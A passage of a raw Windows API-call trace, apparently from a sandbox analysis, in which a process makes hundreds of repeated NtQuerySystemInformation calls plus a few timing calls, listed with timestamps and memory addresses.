Length=0x0, ResultLength=0x0) [0269.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca30, Length=0x38, ResultLength=0x0) [0269.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc950, Length=0x28, ResultLength=0x0) [0269.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc950, Length=0x28, ResultLength=0x0) [0269.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca30, Length=0x38, ResultLength=0x0) [0269.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x20, ResultLength=0x0) [0269.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x20, ResultLength=0x0) [0269.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x20, ResultLength=0x0) [0269.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x20, ResultLength=0x0) [0269.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca30, Length=0x38, ResultLength=0x0) [0269.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x20, ResultLength=0x0) [0269.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x20, ResultLength=0x0) [0269.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x20, ResultLength=0x0) [0269.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.735] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc751dfcb60 | out: lpSystemTimeAsFileTime=0xc751dfcb60*(dwLowDateTime=0x20bae5b, dwHighDateTime=0x1d5fb6f)) [0269.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc18, Length=0x50, ResultLength=0x0) [0269.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb50, Length=0x28, ResultLength=0x0) [0269.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca68, Length=0x50, ResultLength=0x0) [0269.736] GetTickCount () returned 0x1183c0d [0269.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc938, Length=0x58, ResultLength=0x0) [0269.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x38, ResultLength=0x0) [0269.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc680, Length=0x28, ResultLength=0x0) [0269.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc680, Length=0x28, ResultLength=0x0) [0269.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc680, Length=0x28, ResultLength=0x0) [0269.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc680, Length=0x28, ResultLength=0x0) [0269.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x28, ResultLength=0x0) [0269.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x38, ResultLength=0x0) [0269.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x28, ResultLength=0x0) [0269.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x28, ResultLength=0x0) [0269.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x38, ResultLength=0x0) [0269.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x20, ResultLength=0x0) [0269.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x20, ResultLength=0x0) [0269.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x20, ResultLength=0x0) [0269.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x20, ResultLength=0x0) [0269.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x38, ResultLength=0x0) [0269.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x20, ResultLength=0x0) [0269.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0269.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0269.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc938, Length=0x58, ResultLength=0x0) [0269.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0269.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0269.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0269.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0269.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0269.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x28, ResultLength=0x0) [0269.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0269.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0269.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0269.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0269.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0269.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0269.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x20, ResultLength=0x0) [0269.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0269.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0269.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0269.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc780, Length=0x20, ResultLength=0x0) [0269.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0269.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6a0, Length=0x20, ResultLength=0x0) [0269.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0269.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0269.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0269.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0269.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6a0, Length=0x20, ResultLength=0x0) [0269.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0269.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0269.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0269.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0269.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6a0, Length=0x20, ResultLength=0x0) [0269.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x20, ResultLength=0x0) [0269.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x20, ResultLength=0x0) [0269.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc938, Length=0x58, ResultLength=0x0) [0269.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x58, ResultLength=0x0) [0269.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0269.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0269.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0269.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0269.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0269.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5c0, Length=0x28, ResultLength=0x0) [0269.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0269.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0269.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0269.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0269.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x20, ResultLength=0x0) [0269.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0269.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0269.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0269.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0269.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x20, ResultLength=0x0) [0269.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0269.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0269.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x58, ResultLength=0x0) [0269.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0269.765] NtQuerySystemInformation (SystemInformationClass=0xb9, 